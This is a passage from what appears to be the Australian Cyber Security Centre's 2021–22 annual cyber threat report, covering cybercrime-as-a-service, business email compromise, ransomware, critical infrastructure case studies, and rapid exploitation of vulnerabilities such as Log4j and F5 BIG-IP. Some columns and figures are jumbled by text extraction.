corporate, and
enabling roles
40%
across Australia staff located
REDSPICE
A nationally and internationally distributed workforce will create additional redundancy in ASD’s critical capabilities and
opportunities for greater partnership with industry, academia and other sectors of the Australian economy.
40% 4X
global
staff located footprint
outside Canberra
REDSPICE will provide new intelligence capabilities and build our threat intelligence picture, including through threat
intelligence sharing with ACSC partners.
Enhanced National Cyber Defence

y Improves resilience of critical infrastructure against sophisticated cyber attacks
y Increases the visibility of threats to Australia’s most critical systems
y Improves machine-time cyber threat intelligence sharing across government
and industry
y Doubles persistent cyber-hunt activities and nationwide cyber-incident response.
REDSPICE provides $5 billion in opportunities for Australian industry, including small and medium Australian enterprises.
This will grow the wider Australian cyber security sector.
35
Chapter 3
Cybercrime
■ Cybercrime continues to pose a high threat to Australia’s economic and social prosperity.
■ Cybercriminals are increasingly persistent in targeting all sectors of Australia’s economy.
■ Compromises trended towards targeting high value transactions like property settlements.
Cybercrime
Proliferation of threats
Australia is an attractive target for cybercriminals. Our widespread internet connectivity, per-capita wealth, and investment
structures—such as moveable superannuation accounts and widespread share ownership—are all powerful incentives
for cybercriminals.
During the 2021–22 financial year, fraud, financial and identity theft and BEC continued to be common cyber threats due to
their volume and ability to cause severe and long-term harm. Many actors used common techniques such as spear phishing
to compromise victims’ networks.
Australia’s cybercrime environment over 2021–22 was underpinned by the constant, rapid evolution of cybercriminal
techniques used to target Australia for profit. This evolution was not limited to malware but encompassed all aspects of
the cybercriminal environment, including target identification and exploitation, service delivery, cash-out methods, and
supporting infrastructure. Ultimately, while cybercrime capabilities became more sophisticated, they also became more
accessible for less technologically skilled actors. This ongoing evolution enabled cybercriminals to consistently adapt to
environmental changes, while remaining resilient to disruption efforts by law enforcement.
37
Cybercrime-as-a-Service
The evolution of Cybercrime-as-a-Service (CaaS) continued to increase the overall cybercrime threat to Australia. CaaS
encompasses an ever-increasing range of purchasable tools, services and information used to facilitate cybercriminal
operations. Examples of CaaS include, but are not limited to, the complicit provision of server infrastructure used to
host cybercriminal campaigns, the sale of access to compromised victim networks, money laundering services, and the
development and obfuscation of malware. The availability of these enabling functions means that individual actors
are not required to be an expert in every component of a criminal operation. In effect, cybercriminals are outsourcing
elements of their operations, and a growing black market is serving their needs.
Access brokers
Hosting services
Malware distributors
Cybercriminal
Phishing kit developers
Campaign
Malware obfuscation services
Malware developers
Money laundering services
Figure 8: Cybercrime-as-a-Service ecosystem

Cybercrime
The expansion of the CaaS industry has lowered the barrier to entry for actors seeking to conduct cybercrime. For instance,
Ransomware-as-a-Service (RaaS) provides actors who may not have the technical skill to develop their own ransomware
with an opportunity to launch highly profitable attacks. In addition, the CaaS industry allows actors to monetise their
expertise in a particular skillset. As a consequence, cybercriminals have become more specialised over 2021–22, and pose a
greater threat to Australians and businesses.
During 2021–22, the ACSC collaborated with partners on 5 successful operations against criminal online marketplaces and
foreign scam networks. While offshore cybercrime groups have exploited Australian victims, individual actors—including
Australian citizens—remain a threat. Australian law enforcement agencies have leveraged international partnerships to
tackle criminal behaviour across the globe.
Case Study: Operation Boone

In October 2021, the New South Wales (NSW) Supreme Court ordered the forfeiture of $1.66 million by a 23-year-old Sydney
man. This followed his conviction for selling illegally obtained logins for online services such as Netflix. More
than $1.2 million of the proceeds were in cryptocurrency, making for the largest seizure of cryptocurrency in
Australian history.
This was the culmination of Operation Boone, a five year joint investigation by the AFP and the US Federal Bureau of
Investigation (FBI). The Australian man conspired with a US individual to steal the credentials of streaming service
customers. The Australian sold the credentials through 4 account-generator websites which had over 150,000 users.
The proceeds were money-laundered through a complex system of PayPal accounts and cryptocurrency wallets. Following
an extensive investigation, the AFP seized the cryptocurrency and Paypal accounts and charged the Australian with
5 offences.
Operation Boone demonstrates how the AFP’s cybercrime investigation and asset confiscation capabilities work together.
The Australian was sentenced to a 2 year, 2 month intensive corrections order, while the confiscated $1.66 million will be
reinvested in the Australian community through initiatives that include local crime prevention and drug treatment programs.
For individuals, the case study highlights the importance of not reusing passwords. The theft of streaming service logins
relied on credential stuffing—using stolen usernames and passwords to access other services via automated logins. If
account owners had used secure passphrases or multi-factor authentication (MFA), their accounts would not have been
compromised by the offender.
39
Business Email Compromise

BEC, where malicious actors compromise organisations via email, continues to be lucrative for cybercriminals. BEC
is not limited to scamming businesses out of money or goods. Cybercriminals also use BEC to pretend to be business
representatives or to trick employees into revealing confidential business information. BEC is also an entry point for
malicious actors to move into higher value targets within networks. The compromise of a single employee email can be a
prelude to a major ransomware attack.
In 2021–22, the number of successful BEC reports declined slightly to 1514. However, self-reported losses in 2021–22 increased
significantly to over $98 million. Nationally, the average loss per successful BEC increased to over $64,000. The most BEC
reports came from Queensland (389 reports), but average self-reported financial losses were highest in Western Australia,
at approximately $112,000 per report. Western Australia had several reports of financial losses over $1 million due to BEC,
lifting its overall average.
Investigations into BEC suggest property settlements are being targeted. This is likely due to the high value of transactions.
Property prices increased further during the coronavirus pandemic and digital settlement methods became more
entrenched, making property transactions an attractive target. Despite the best efforts of law enforcement agencies, only a
small fraction of BEC financial losses are ever recovered.
19
389
Average loss: $26,000
197
111
378
33
344 Average loss: $55,000
Total cases: 1514 Average loss: $56,000
43
800 0
Figure 9: Breakdown of successful BEC reports by jurisdiction for financial year 2021–22
40
Cybercrime
AFP Initiative: Operation Dolos

Operation Dolos is an AFP-led, multi-agency taskforce which counters transnational cybercriminals conducting or
facilitating BEC—a cybercrime which commonly crosses borders. Operation Dolos targets and disrupts the BEC crime model,
ultimately disrupting transnational organised cybercrime syndicates.
To do this, Operation Dolos works with individual Australians and small to medium businesses that have been targeted by
BEC, and disrupts the flow of proceeds to and from BEC syndicates. In December 2021, the AFP announced the arrest of 18
money mules by NSW Police, Victoria Police, and Queensland Police.
In the 2021–22 financial year, Operation Dolos was able to recover over $5.97 million in funds stolen by cybercriminals.
Case study: Falsified invoices via BEC

In July 2021, an Australian financial firm fell victim to BEC, paying over $600,000 on behalf of one of their clients after
receiving a falsified invoice. The invoice appeared to be legitimate and from a business that they regularly dealt with, but
the bank details had been altered to an account controlled by cybercriminals. The funds were laundered through the
purchase of cryptocurrency, gold bullion, cash withdrawals and other purchases.
In April 2022, AFP Cyber Command, NSW Police, and Victoria Police conducted a joint activity under Operation Dolos and
arrested the member of the syndicate responsible for laundering the proceeds of the crime. Over $140,000 was recovered
and returned to the victim.
The case study illustrates the importance of verifying requests for large payments and banking changes, even when they
appear to come from businesses with an established reputation. Technical controls such as MFA and secure email gateways
can also protect organisations from BEC.
41
TECHNOLOGY ADVANCES RAPIDLY.
SO DO CYBERCRIMINALS.
Protect yourself against cybercrime.
Act now, stay secure. Learn more at CYBER.GOV.AU

Cybercrime
How to protect yourself from cybercrime

Cybercriminals are increasingly persistent in targeting all sectors
of Australia’s economy. Financial losses divert resources from other Act Now, Stay Secure
areas of critical need. The ACSC seeks to counter this targeting themes
through tailored advice to different sectors of Australian society;
for instance through the Act Now, Stay Secure communication and
July 2021
uplift program.
Email Security
August 2021
Backups
September 2021
Annual Cyber Threat Report
October 2021
Over the 2021–22 financial year, the Act Now, Stay Secure Updates
advertising campaign:
November 2021
■ delivered over 57 million online ads to Australians though social Online Shopping
media, video and search The launch of the Australian
■ reached over 6.2 million Australians through broadcast Cyber Security Hotline
radio advertising The launch of the online
■ was supported by an organic social media campaign with a learning resources on
potential reach of 637,000 people cyber.gov.au
■ was amplified by 191 stakeholders sharing campaign content to The launch of the Small
their own channels. Business Cyber Security guide
February 2022
Secure Your Portable Devices
Cyber Security Instruction
Manual: A Kid’s Guide
March 2022
Backups
ACSC Alert and Advisory
April 2022
Ransomware
May 2022
Password Managers
June 2022
Email Security
43
Chapter 4
Ransomware
■ The ACSC assesses that ransomware remains the most destructive cybercrime threat.
■ All sectors of the Australian economy were directly impacted by ransomware in the last
financial year.
■ The ACSC provides tailored advice on ransomware mitigation, including for individuals and
small business.
Ransomware
Ransomware targeting
Ransomware is a cyber dependent crime which can impact Ransomware tactics
everyone from consumers through to countries. For example,
The combination of data encryption and threats to publicly
the Costa Rican government declared a state of emergency
release sensitive information as a method of pressuring
in May 2022 following ransomware attacks on nearly 30
ransomware victims into paying is known as ‘double
government institutions, including its health, finance, energy
extortion’. Victims who previously would have been able to
and social services departments. While Australia has not
recover from a ransomware incident by maintaining regular
experienced an incident of this scale, the potential remains
backups may still be vulnerable to reputational damage
for cybercriminals to cause widespread disruption.
resulting from double extortion. In 2021–22, ransomware
Top-tier ransomware groups are continuing to target actors continued to incorporate additional extortion tactics
Australian ‘big game’ entities—organisations that are high in their operations to more effectively extract payment
profile, high value, or provide critical services. While global from victims. This is often referred to as ‘multifaceted
trends indicate a decline in ‘big game’ targeting and a shift extortion’. Examples of additional extortion tactics include
towards targeting small and medium sized businesses, that convincing third-party stakeholders to pressure victims
change has yet to be seen in Australia. into negotiation, and sustained DDoS attacks against the
victim’s network during ransom negotiations.
The business model of ransomware groups continued
to evolve. Some ransomware groups now share victim
information, increasing the ransomware threat as victims
Ransomware-as-a-Service
potentially face targeting by more than one group. For The ACSC observed the emergence of new and possibly
example, after announcing its shutdown, the BlackMatter rebranded RaaS operations over 2021–22. The availability
group transferred its victims to ransomware infrastructure of RaaS offerings affords cybercriminals a choice about the
owned by another group, known as Lockbit 2.0. And, in tools they can use. Ransomware syndicates also continued
October 2021, members of the Conti ransomware group to professionalise by using third parties to negotiate with
reportedly began selling access to victims’ networks, victims, assist them in receiving their ransom payments,
enabling follow-on targeting by other actors. and arbitrating disputes between actors.
45
Pre-crime
Cybercriminals establish
themselves online and obtain the
necessary skills, experience and/or
relationships to be successful.
Post-crime Preparation
Cybercriminals profit from the Cybercriminals design and
activity, including laundering implement their operating model,
the funds to safely access the including establishing technical
proceeds of crime. Cybercriminals and financial infrastructure and
pay collaborators and advertise selecting their target.
success to enhance reputation.
Money Movement 3 Money Movement 1

Cybercriminal → Criminal Associates Cybercriminal → Service Providers
Exit Actualisation
Cybercriminals conclude the Cybercriminals commit the crime,
crime and cease all victim including conducting network
contact. Depending on ransom reconnaissance, exfiltrating data
payment, cybercriminals will leak and encrypting files.
or decrypt victim data.
Engage and negotiate

Money Movement 2
Victim → Cybercriminal Cybercriminals engage with
victim/third party to apply
pressure and/or negotiate
ransom payment.
Figure 10: The ransomware business model
46
Ransomware
Ransomware trends
All sectors of the Australian economy were directly The top 5 reporting sectors for ransomware accounted for
impacted by ransomware in 2021–22. The ACSC received 47 per cent of all ransomware-related cybercrime reported
447 ransomware cybercrime reports via ReportCyber. While to ReportCyber during the 2021–22 financial year.
this is a 10 per cent decrease compared with the 2020–21
The ACSC responded to 135 cyber security incidents related
financial year, reports remain higher than in 2019–20. It is also
to ransomware, an increase of over 75 per cent compared
likely that ransomware remains significantly underreported,
to 2019–20. In addition, the ACSC identified and notified 148
especially by victims who choose to pay a ransom.
organisations of ransomware activity.
The education and training sector reported the most
ransomware incidents in 2021–22, rising from the fourth-
highest reporting sector in 2020–21. The threat to the
education and training sector is significant as its business
model favours open collaborative environments. Remote
learning during the coronavirus pandemic also introduced
large numbers of personal devices and new software into
this sector.
Education and Training 11%
Information Media and Telecommunications 10%
Professional, Scientific and Technical Services 10%
Government – State/Territory/Local 8%
Health Care and Social Assistance 8%
Figure 11: Top 5 reporting sectors for ransomware-related cyber security incidents
47
AFP–ACSC–ACIC Initiative: Operation Orcus

In July 2021, the AFP established Operation Orcus, an AFP-led multi-agency taskforce to coordinate law enforcement efforts
against ransomware, particularly targeting ransomware developers and those who use RaaS. The taskforce comprises
AFP, ACSC, ACIC, AUSTRAC and state and territory police. Operation Orcus also works with international partners, including
Interpol and Europol.
During 2021–22, Operation Orcus analysed hundreds of ransomware incidents and prepared and distributed intelligence
reports. Operation Orcus detected indicators of compromise showing Australian organisations being targeted by
ransomware, and notified impending victims. These notifications prevented attacks and protected Australian organisations
from financial loss.
Data breaches
Cybercriminals target the PII of employees and customers, seeking to maximise the commercial and reputational impact
of a data breach. In the last financial year, human resources organisations such as payroll and recruitment companies
have been frequently targeted by ransomware actors, as these types of companies provide services across a wide range
of sectors. Compromises of payroll providers in 2021–22 led to the data of hundreds of thousands of Australian employees
being accessed and exposed.
Social assistance organisations, which hold sensitive data on vulnerable people, have also been targeted in Australia and
internationally. For example, in January 2022, the Swiss-based International Committee of the Red Cross publicly stated
a ransomware attack on its servers had compromised the personal data of more than half a million people, including
refugees and internally displaced people in conflict zones across the world.
48
Ransomware
Case Study: Australian social assistance organisation

In March 2022, an Australian social assistance organisation was targeted by ransomware resulting in the theft of data. The
malicious actor gained access to the organisation’s servers through exploiting an unpatched version of Microsoft Exchange.
Within 4 days, the malicious actor moved from initial access to encryption. The organisation’s Chief Information Security
Officer told the ACSC, “it spins my head about how quickly they were able to move around the network”.
The organisation identified that its systems had been encrypted and immediately notified Commonwealth and state
agencies. It engaged its existing commercial incident response provider to provide technical support and conduct an
investigation. The organisation credits its ability to recover so quickly to maintaining a strong relationship with their incident
response provider and moving to cloud-based backups in the months before the incident. Remediation and related network
security improvements cost approximately $200,000, which was substantially less than the ransom demanded.
Since this incident, the organisation continues to monitor for residual risk, and is hardening its cyber defences more broadly,
including enhanced restrictions for applications, and better managed network awareness.
During the organisation’s engagement with the ACSC, it shared indicators of compromise, which the ACSC shared through
the CTIS portal. This enabled other organisations to better protect themselves, ultimately strengthening the security of
Australian organisations.
49
Cost to victims of ransomware

Regardless of the size of the victim, ransomware can be expensive to resolve. The most immediate costs come from the lost
productivity due to system downtime, and the time and money needed to rebuild systems following an incident. The legacy
of a ransomware incident poses additional challenges, such as tarnishing a victim’s reputation among its customers.
Case Study: Australian healthcare organisation

A Sodinokibi (also known as REvil) ransomware group targeted a medium-sized business in the Australian healthcare sector,
encrypting critical files and preventing access to business-critical systems. The malicious actor demanded several hundred-
thousand dollars in exchange for the decryption keys and an assurance that the stolen data would not be publicly released.
Even with the involvement of specialists, ransomware incidents can take months to resolve. In this instance, despite the
engagement of a law firm, third-party negotiator and insurance company, and a willingness by the victim to pay the ransom,
resolution and restoration of data took approximately 3 months, severely impacting business operations for the victim.
Victims of ransomware attacks continued to use third-party negotiators to facilitate payment of ransom demands in
2021–22. The level of coverage provided under cyber insurance policies is also a contributing factor in how these incidents
are handled and resolved by victims, and whether a business decides to pay the ransom.
A 2022 study published by the Australian Institute of Criminology found only 19 per cent of ransomware victims sought
advice or support from police or the ACSC. However, the study found nearly 60 per cent sought help from at least one
formal source outside of their family or friends. The study found 23.2 per cent of small to medium business victims paid the
ransom, with many millions of dollars being paid in ransoms and other associated costs.
ACSC advice on payment of ransom demands

The ACSC advises against paying a ransom. Doing so does not guarantee a victim’s files will be restored,
nor does it prevent the publication or sale of any stolen data. Along with increasing the likelihood of a
victim being targeted again, each ransom payment also bolsters the viability of the ransomware market
and puts other Australian organisations at greater risk.
Irrespective of the decision to pay a ransom, all victims are strongly encouraged to report ransomware-related cybercrime
and cyber security incidents to the ACSC. This is essential to develop national visibility of ransomware threats, including
emerging trends and ransomware precursors. Even when organisations have sufficient in-house or contracted incident
response to address a ransomware incident, sharing technical and contextual information with the ACSC enables the ACSC
to implement measures to reduce ransomware targeting and protect other potential victims.
50
Ransomware
Ransomware Action Plan

On 13 October 2021, Australia’s Ransomware Action Plan was released. The plan outlined the proposed
capabilities and powers that Australia would use to combat ransomware, and a suite of reforms designed
to help the Australian Government better assist victims of ransomware attacks and prosecute ransomware
groups. Complementing a range of measures under the 2020 Cyber Security Strategy, the plan seeks to
ensure that Australia remains a hard target for cybercrime by launching additional operational activity to
target criminals seeking to disrupt, and profit from, Australian business and individuals.
What you should do

How to protect yourself from ransomware
To support Australians in preventing and mitigating ransomware incidents, the ACSC provides
technical advice and guidance, including profiles of ransomware actors, via cyber.gov.au. The ACSC
also collaborates with domestic and international intelligence and law enforcement partners to
disrupt the syndicates causing the greatest harm, and provide operational intelligence regarding
cybercriminals targeting Australia. This is a part of a whole-of-government approach to combating
ransomware.
Organisations can protect themselves from ransomware using the ACSC’s tailored guidance below.
Individuals, and small and medium-sized businesses:
■ Follow the steps in the ACSC’s Ransomware Prevention and Protection Guide.
Government, large businesses and critical infrastructure:
■ Implement the ACSC’s Essential Eight Mitigation Strategies and Strategies to Mitigate Cyber
Security Incidents.
■ Become an ACSC partner and participate in ACSC initiatives and exercises.
51
Chapter 5
Critical infrastructure
■ The disruption of critical infrastructure puts access to essential services at risk.
■ Globally, critical infrastructure has been increasingly targeted by malicious actors.
Current critical infrastructure threat

The cyber threat to Australia’s critical infrastructure is an enduring concern, because the social or economic well-being of
the nation depends on critical infrastructure assets working in cohesion. Critical infrastructure encompasses the physical
facilities, communication networks, and information and operational technologies that provide essential services. A
sustained disruption in one part of the critical infrastructure ecosystem has knock-on effects elsewhere in the economy,
and could ultimately lead to harm or loss of life, as seen internationally as a consequence of ransomware attacks on
health services. The potential remains for state actors and cybercriminals to cause similar disruption through targeting of
Australian critical infrastructure entities.
During 2021–22, critical infrastructure networks globally were targeted at phenomenal rates. Russia’s targeting of Ukrainian
critical infrastructure was particularly prolific, including the use of destructive malware against high-voltage electrical
substations. However, the threat is not limited to Ukraine. Some Russia-aligned cybercrime groups—including one that has
successfully targeted Australian critical infrastructure—have publicly threatened to conduct operations against Ukraine’s allies.
The risk to Australia’s critical infrastructure networks is real. In 2021, the corporate network of electricity generator CS Energy
was targeted by the Russia-aligned Conti ransomware group, as detailed below.
Case Study: CS Energy

In 2021, the corporate ICT network of Queensland Government-owned electricity generator CS Energy —which generates
10 per cent of the electricity for the national electricity market— was targeted by the Conti ransomware group. On 27
November 2021, CS Energy became aware of a ransomware incident affecting its corporate network and immediately
severed the external internet connection to its corporate network and initiated business continuity procedures.
CS Energy also alerted relevant Australian Government and Queensland Government agencies, and as an established
ACSC partner, closely collaborated with ACSC incident response support and external specialists to remedy the incident.
As a result of network segregation —a recommended mitigation for business continuity— CS Energy’s operational
technology systems were physically segregated from the corporate network, ensuring that the incident did not compromise
operational technology systems, including electricity generation. Energy supplies were not affected by the incident.
This incident highlights the value of network segmentation and the importance of having incident response, business
continuity and disaster recovery plans in place. By acting decisively, CS Energy, commercial incident response and cyber
security specialists, and the ACSC worked together to respond to the incident, demonstrating the maturity of Australia’s
cyber security sector.
Not all targeting of critical infrastructure is geostrategic; some is profit-motivated, and some is opportunistic exploitation of
widespread vulnerabilities. Even the most trivial exploitation can result in major impact, especially if malicious actors move
laterally from internet-facing devices on corporate networks to the operational networks of critical infrastructure providers.
Certain critical infrastructure networks face additional challenges, such as the use of legacy operational technology with
long life cycles (up to 50 years for some operational hardware), making patching and monitoring of networks more difficult.
53
Critical infrastructure trends

During 2021–22, the ACSC reshaped its definition of critical infrastructure to better align with the definitions of Regulated
Critical Infrastructure and Systems of National Significance under the SoCI Act. In the 2020–21 financial year, the ACSC
defined approximately one quarter of cyber security incidents it responded to as affecting critical infrastructure. However,
this definition covered a range of infrastructure and services outside the scope of the SoCI Act, and also captured
some severe incidents regardless of sector. In the 2021–22 financial year, using the new definitions, 95 cyber incidents
(approximately 8 per cent of all cyber incidents the ACSC responded to) affected critical infrastructure. Since the
implementation in April 2022 of amendments to the SoCI Act, the ACSC has notified 5 critical infrastructure entities of cyber
incidents and vulnerabilities on their networks.
The ACSC urges organisations to report all cyber security incidents, regardless of whether or not their organisation is
subject to mandatory reporting under the SoCI Act. Reporting increases the visibility of threats, enables the identification of
trends, and supports the prevention and mitigation of future incidents.
54
Ransomware and critical infrastructure

Over 2021–22, there were further examples of ransomware groups targeting critical infrastructure. For instance, the BlackCat
ransomware group targeted government and critical infrastructure organisations, as well as the finance and construction
sectors globally.
The threat to critical infrastructure is not limited to large utilities such as electricity providers. For example, local governments
can be an attractive target, as some councils have responsibility for essential services such as water and sewage.
Case Study: Local council ransomware incident

In April 2022, a NSW council was targeted by a ransomware incident. The initial access occurred at least 2 weeks before the
incident, with the malicious actor likely timing the incident to occur over the Easter long weekend.
Manual processes were immediately implemented to manage water-quality testing and level monitoring, and temporary
servers were established within 24 hours to restore remote monitoring.
The incident impacted a wide range of business operations, including council minutes, employee financial data, and
systems responsible for monitoring water quality. The incident also had a huge impact on council technology staff, who
worked 40–80 hours overtime a week during their initial response.
The council engaged a commercial incident response provider, and its Managed Service Providers (MSP) deployed
additional capabilities. The ACSC provided advice to the council and warned ACSC partners in the water sector to be alert
to possible ransomware targeting.
The incident demonstrates the interplay between IT, operational technology, and the physical environment. The initial
access through a legacy entry point impacted multiple systems, including operational technology systems, which meant
that council workers had to manually test water quality and levels following overnight rain. A swift response by the council,
its MSP, and the ACSC ensured there was no compromise of water or sewage services. The council’s MSP continues to
monitor the darkweb for data leaks.
The case study demonstrates the importance of decommissioning legacy systems and erecting firewalls between IT and
operational technology systems.
55
Advice and support for critical infrastructure

organisations
A wide range of critical infrastructure providers are subject to mandatory cyber incident reporting requirements, including
critical food, transport and higher education assets. The ACSC has a dedicated portal for reporting cyber security incidents
that impact critical infrastructure assets, including a list of critical infrastructure sectors and asset classes following
amendments to the SoCI Act.
In recognition of the additional cyber security obligations critical infrastructure organisations have, the ACSC offers tailored
critical infrastructure exercise and uplift programs. These assist ACSC partners to implement risk mitigation strategies.
ACSC initiative: AquaEx

In August 2021, the ACSC coordinated a national cyber security exercise series in partnership with Australia’s urban water
and wastewater sector and government agencies. The exercise series provided an opportunity for industry and government
to exercise arrangements for responding to, and recovering from, a ransomware incident impacting Australia’s urban water
and wastewater sector.
Planning for the exercise series included exercise management workshops and cyber security information sessions.
These provided opportunities for participants to share approaches to preventing, detecting and responding to
ransomware incidents.
Executive and senior management were actively engaged in the exercise series, with some organisations conducting their
largest ever exercises. Participating executives have indicated that they would like their organisation to be involved in more
exercises like AquaEx in the future. It is this level of support and engagement at senior levels that will continue to increase
organisational cyber resilience.
Opportunities that have been identified as a result of AquaEx include organisations continuing to review and exercise their
cyber response plans, expanding their playbooks to include more threat vectors, and solidifying the relationships developed
between industry and government.
Despite COVID-19 impacts, the exercise reached over 750 participants from across industry and government who were able
to work together to strengthen cyber resilience across the nation.
56
ACSC initiative: Critical Infrastructure – Uplift Program

In support of Australia’s critical infrastructure, in 2021–22 the ACSC piloted the Critical Infrastructure Uplift Program (CI-UP).
CI-UP is a voluntary service provided by the ACSC to help protect Australia’s essential services from cyber threats by raising
the cyber security levels of critical infrastructure organisations.
Through close collaboration between the ACSC and partners, CI-UP evaluates the cyber security maturity of critical
infrastructure and systems of national significance. A combination of Cyber Security Capability and Maturity Model (C2M2)
and Essential Eight maturity models are used to deliver prioritised vulnerability and risk management strategies.
The pilot concluded in June 2022. The ACSC now provides 2 models for CI-UP service:
CI-UP: A modular suite of cyber security maturity activities undertaken through close collaboration with the ACSC to deliver
holistic cyber security maturity uplift for CI-UP partners.
CI-UP (Self-Assessment): A self-assessment C2M2 evaluation tool enabling ACSC partners to access online resources
through the ACSC Partner Portal.
Case Study: CI-UP pilot uplift

In late 2021, the ACSC undertook multiple pilot uplifts with critical infrastructure organisations at differing cyber security
maturity levels.
In one pilot, the ACSC partnered with Queensland Airports Limited (QAL) to understand the maturity of its cyber security.
This uplift was conducted remotely due to COVID-19 impacts, but was successful nonetheless due to QAL’s proactive
engagement. The active participation gave the CI-UP team a deep understanding of QAL’s baseline cyber security posture,
enabling the provision of targeted advice.
Despite the challenges of working during COVID-19 restrictions, the ACSC and QAL teams collaborated to deliver one of
QAL’s most successful cyber outcomes to date.
As a result, QAL has a better understanding of its holistic cyber security posture, and a prioritised list of recommended
remediation activities to continue hardening its cyber defences.
57
Chapter 6
Critical vulnerabilities
■ The ACSC observed an increasing trend of state actors and cybercriminals rapidly exploiting
publicly reported critical security vulnerabilities.
■ Rapid and comprehensive patching is vital, along with constant monitoring for indicators
of compromise.
Vulnerabilities being targeted faster and by

more actors
During 2021–22, the number of software vulnerabilities recorded worldwide increased by more than 25 per cent compared
to the previous financial year. Over 24,000 Common Vulnerabilities and Exposures (CVEs )were identified during 2021–22.
Of these, there were numerous critical and high-impact vulnerabilities, with notable examples including vulnerabilities in
Microsoft Azure and Log4j products. Within hours of disclosure, the ACSC identified malicious actors conducting scanning
and reconnaissance against internet-accessible networks to identify unpatched software. In some instances, cyber actors
successfully compromised Australian networks using publicly disclosed critical vulnerabilities.
The rapid use of newly released critical vulnerabilities is now standard tradecraft for many malicious actors. Certain
software and hardware is used ubiquitously across government, critical infrastructure, small business and by individual
users, presenting malicious actors with a plethora of potential victim networks. When a new vulnerability emerges,
the ACSC’s Cyber Hygiene Improvement Programs (CHIPs) frequently identifies numerous Australian devices which are
unpatched and vulnerable to exploitation.
ACSC Initiative: Cyber Hygiene Improvement Programs (CHIPs)

CHIPs is an ACSC capability that tracks and monitors the cyber security posture of Australian, state, territory and local
government entities’ internet-facing assets. CHIPs also conduct rapid operational tasking when potential cyber threats
emerge, such as newly disclosed vulnerabilities.
Through these activities, CHIPs can quickly build visibility of security vulnerabilities across all levels of government and
provide vulnerability notifications to system owners.
In 2021–22, 49 high priority operational tasks were undertaken to protect Australian networks, including scans of government
entities and Australian-attributed Internet Protocol addresses for potential compromise by critical vulnerabilities.
Case Study: Australian energy provider

Following the public disclosure of a vulnerability in April 2022, CHIPs contacted several Australian organisations from
across the government, critical infrastructure, transportation and services sectors, notifying them of potentially vulnerable
software on their internet-facing servers, and offering assistance. One of the organisations contacted was an Australian
energy provider.
Immediate actions from the energy provider in response to ACSC’s notification confirmed 2 servers had been exploited. Existing
network segmentation, specifically a demilitarised zone (DMZ)—a network kept separate from the core network to protect
information from less trusted networks, such as the internet—worked as intended. As a result, energy operations were not
disrupted. The provider was quick to remediate by restoring the affected servers from backups and applying relevant patches.
Further to the actions of the energy provider, the ACSC conducted a forensics investigation to reconstruct the steps taken by
the malicious actors. The investigation found that multiple instances of successful exploitation of the vulnerability occurred
in a very short period of time. Evidence suggests that exploitation was conducted by multiple actors, including state-
sponsored and criminal entities, much of which was likely automated. Sophisticated actors sought to access user login
data, with the likely intent to gain more persistent access once the compromise was remediated.
The responsiveness of the energy provider and strong network segmentation were crucial to containing the compromise.
59
Comparative critical vulnerabilities timelines

The time between vulnerability disclosure and exploit is closing rapidly; what once took weeks is now taking days or even
hours. The following timelines highlight the shortening window for organisations to mitigate threats:
4 May 2022
F5 publicly disclosed a vulnerability
in BIG-IP network devices that
allowed malicious actors to execute 6 May 2022
What is F5 BIG-IP?
arbitrary commands, create or
A platform used to control delete files, or disable services. F5 ACSC performed CHIPs scanning
traffic that passes through an encouraged users running at-risk to determine how many Australian
enterprise network, developed versions to upgrade as soon devices were vulnerable, and notified
by US company F5. as possible. government operators.
F5 BIG-IP
Confluence
What is Confluence? 25 August 2021
A web-based database tool for Atlassian publicly announced a
team collaboration, developed vulnerability (CVE-2021–26084)
by Australian technology in certain versions of Atlassian
company Atlassian. Confluence and released software
version updates the same day.
The scalability and low cost of automated cyber exploitation techniques

mean the driver for this type of compromise is likely to be the existence of
vulnerabilities in victim organisations, rather than an adversary’s interest
in a particular network. This ability of a wide array of cyber threat actors to
compromise multiple networks, and then assess the value of those accesses,
will make it more difficult to attribute a specific motive for targeting an
individual Australian network.
60
Key takeaway
In an environment where multiple vulnerabilities are disclosed, rapid patching is not enough. Organisations must
also monitor for indicators of compromise.
9 May 2022
Days from proof of The ACSC published an Advisory
3 concept until reported
exploitation
addressing multiple vulnerabilities in
the F5 BIG-IP Product Range.
6-7 May 2022 Exploits which required just 2 10 May 2022

commands and some headers
Just days after the vulnerability was became publicly known. The Security researchers tweeted that
disclosed, researchers published vulnerability was so easy to exploit “real world devices are being erased”.
exploits, with malicious actors that some security researchers The ACSC received its first reported
soon using them in attacks across speculated that it did not end up in Australian incidents relating to
the internet. the products by accident. exploitation of F5.
31 August 2021 1 September 2021

A Proof of Concept for the exploit was A CHIPs scan detected malicious
published online; first public reports actors scanning for, and attempting
of exploitation occurred the to exploit, this vulnerability on
same day. Australian networks. The ACSC
published an Advisory the same day.
Day from proof of
1 concept until reported
exploitation
Key takeaway
Over two-thirds of the cyber security incidents the ACSC responded to relating to this vulnerability occurred in the
first 6 days following the Proof of Concept, underscoring how new vulnerabilities are being rapidly exploited by
malicious actors.
61
Log4j
The most prevalent critical vulnerability in the 2021–22 Program, and amplified advice on social media which had
financial year was Log4j. Log4j is a popular software a potential reach of over one million people.
building block found in a wide variety of Java applications.
The ACSC is aware of malicious actors, including
It provides logging functionality, recording the activity of
sophisticated cyber threat actors, conducting a large
the software in order to diagnose problems. Over 100,000
number of reconnaissance scans for Log4j vulnerabilities.
products may contain Log4j—as Log4j is open source
Some Australian networks were compromised through Log4j,
software, there is no definitive list.
and the ACSC responded to over 50 cyber security incidents.
The series of Log4j vulnerabilities made public in December
The ACSC has identified Log4j exploits being used months
2021 were trivial to exploit. The vulnerability could be used
after the initial disclosure. Malicious actors also routinely
to execute code on the servers of the Minecraft video game
scan for vulnerabilities years after they are initially disclosed,
by pasting messages into a chat box, for example.
targeting networks which are running legacy software
In response to the Log4j vulnerabilities, the ACSC raised or have failed to patch. For instance, a 28 April 2022 Joint
awareness, provided timely advice, and worked closely with Five-Eyes Advisory observed that 6 of the top 15 Routinely
government, industry partners and impacted organisations Exploited Vulnerabilities in 2021 were first disclosed in 2020 or
to protect against exploitation of this vulnerability. Over earlier. Log4j is likely to be a means of access for malicious
December 2021 – January 2022, the ACSC provided technical actors for years to come.
support to impacted organisations, released 2 critical Alerts
and 2 Advisories that were regularly updated, hosted 7
information sharing events through the ACSC Partnership
Log4j
Timeline
24 November 2021 10 December 2021 13 December 2021
The cloud security team The vulnerability was The ACSC commenced
of Chinese company publicly disclosed technical incident
Alibaba privately by cyber security response assistance
reported the Log4j researchers. The to impacted
vulnerability to the ACSC issued a public organisations, and
software developer. Alert the same day commenced briefings
and commenced a of the National Cyber
comprehensive suite Security Committee,
of awareness and Australian Government
